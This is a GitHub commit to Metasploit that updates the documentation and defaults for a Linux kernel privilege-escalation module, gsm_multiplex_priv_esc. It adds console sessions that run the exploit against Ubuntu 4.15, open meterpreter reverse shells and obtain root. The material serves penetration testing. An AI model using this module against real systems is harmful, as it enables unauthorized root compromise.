Update the documentation

rapid7 · Feb 20, 2024 · 037b43a · 037b43a
1 parent 91d24a7
commit 037b43a
Show file tree

Hide file tree

Showing 2 changed files with 43 additions and 33 deletions.
diff --git a/documentation/modules/exploit/linux/local/gsm_multiplex_priv_esc.md b/documentation/modules/exploit/linux/local/gsm_multiplex_priv_esc.md
@@ -36,56 +36,65 @@ A writable directory file system path. (default: `/tmp`)
 
 ### COMPILE
 
-Options: `Auto` `True` `False` (default: `Auto`)
+Options: `Auto` `True` `False` (default: `True`)
 
 Whether the exploit should be live compiled with `gcc` on the target system,
 or uploaded as a pre-compiled binary.
 
 `Auto` will first determine if `gcc` is installed to compile live on the system,
 and fall back to uploading a pre-compiled binary.
 
-## Compiled Executable
-
-The module makes use of a pre-compiled exploit executable to be
-used when `gcc` is not available on the target host for live compiling,
-or `COMPILE` is set to `False`.
-
-The executable was cross-compiled with [musl-cross](https://s3.amazonaws.com/muslcross/musl-cross-linux-6.tar).
-
-```bash
-./x86_64-linux-musl-gcc -o exploit -s -pie -static exploit.c
-```
+Currently only `True` is supported.
 
 ## Scenarios
 
 ```
+msf6 > use exploit/linux/local/gsm_multiplex_priv_esc
+[*] Using configured payload python/meterpreter/reverse_tcp
 msf6 exploit(linux/local/gsm_multiplex_priv_esc) > check 
-[!] SESSION may not be compatible with this module:
-[!]  * incompatible session architecture: python
-[+] System architecture x86_64 is supported
-[+] Ubuntu running Linux 4.15.0-20-generic is vulnerable
+[+] System architecture x64 is supported
+[+] Ubuntu running Linux 4.15.0-20-generic is vulnerable.
 [+] System has 4 CPU cores
-[+] The target is vulnerable.
-msf6 exploit(linux/local/gsm_multiplex_priv_esc) > exploit
-[*] Started reverse TCP handler on 192.168.138.118:9128 
-[!] SESSION may not be compatible with this module:
-[!]  * incompatible session architecture: python
+[*] The target appears to be vulnerable.
+msf6 exploit(linux/local/gsm_multiplex_priv_esc) >
+```
+
+```
+msf6 > use exploit/linux/local/gsm_multiplex_priv_esc
+[*] Using configured payload python/meterpreter/reverse_tcp
+msf6 exploit(linux/local/gsm_multiplex_priv_esc) > run
 [*] Running automatic check ("set AutoCheck false" to disable)
-[+] System architecture x86_64 is supported
-[+] Ubuntu running Linux 4.15.0-20-generic is vulnerable
+[+] System architecture x64 is supported
+[+] Ubuntu running Linux 4.15.0-20-generic is vulnerable.
 [+] System has 4 CPU cores
-[+] The target is vulnerable.
-[+] gcc is installed
+[+] The target appears to be vulnerable.
+[*] Inlining the payload inside the exploit.
 [*] Live compiling exploit on system...
-[*] Writing '/tmp/.3KcRZM' (250 bytes) ...
 [*] Launching exploit
-[*] Transmitting intermediate stager...(126 bytes)
-[*] Sending stage (3045380 bytes) to 192.168.138.192
-[+] Deleted /tmp/.Rr0y7I2WQ
-[*] Meterpreter session 13 opened (192.168.138.118:9128 -> 192.168.138.192:45906) at 2024-02-05 21:49:46 +0000
-msf6 exploit(linux/local/gsm_multiplex_priv_esc) > sessions -i 13
-[*] Starting interaction with 13...
+[*] Sending stage (24772 bytes) to 192.168.138.192
+[*] Meterpreter session 2 opened (192.168.138.118:4444 -> 192.168.138.192:45816) at 2024-02-20 23:45:39 +0000
+meterpreter > getuid 
+Server username: root
+meterpreter > :)
+```
 
+```
+msf6 > use exploit/linux/local/gsm_multiplex_priv_esc
+[*] Using configured payload python/meterpreter/reverse_tcp
+msf6 exploit(linux/local/gsm_multiplex_priv_esc) > set payload linux/x64/meterpreter_reverse_tcp
+payload => linux/x64/meterpreter_reverse_tcp
+msf6 exploit(linux/local/gsm_multiplex_priv_esc) > run
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] System architecture x64 is supported
+[+] Ubuntu running Linux 4.15.0-20-generic is vulnerable.
+[+] System has 4 CPU cores
+[+] The target appears to be vulnerable.
+[*] Using a payload binary.
+[*] Writing '/tmp/.KQ5ubQ4P3' (1068672 bytes) ...
+[*] Live compiling exploit on system...
+[*] Launching exploit
+[*] Sending stage (24772 bytes) to 192.168.138.192
+[*] Meterpreter session 2 opened (192.168.138.118:4444 -> 192.168.138.192:45910) at 2024-02-20 23:47:54 +0000
 meterpreter > getuid 
 Server username: root
 meterpreter > :)

diff --git a/modules/exploits/linux/local/gsm_multiplex_priv_esc.rb b/modules/exploits/linux/local/gsm_multiplex_priv_esc.rb
@@ -60,7 +60,8 @@ def initialize(info = {})
         },
         'DefaultTarget' => 0,
         'DefaultOptions' => {
-          'Payload' => 'python/meterpreter/reverse_tcp'
+          'Payload' => 'python/meterpreter/reverse_tcp',
+          'Compile' => 'True'
         }
       )
     )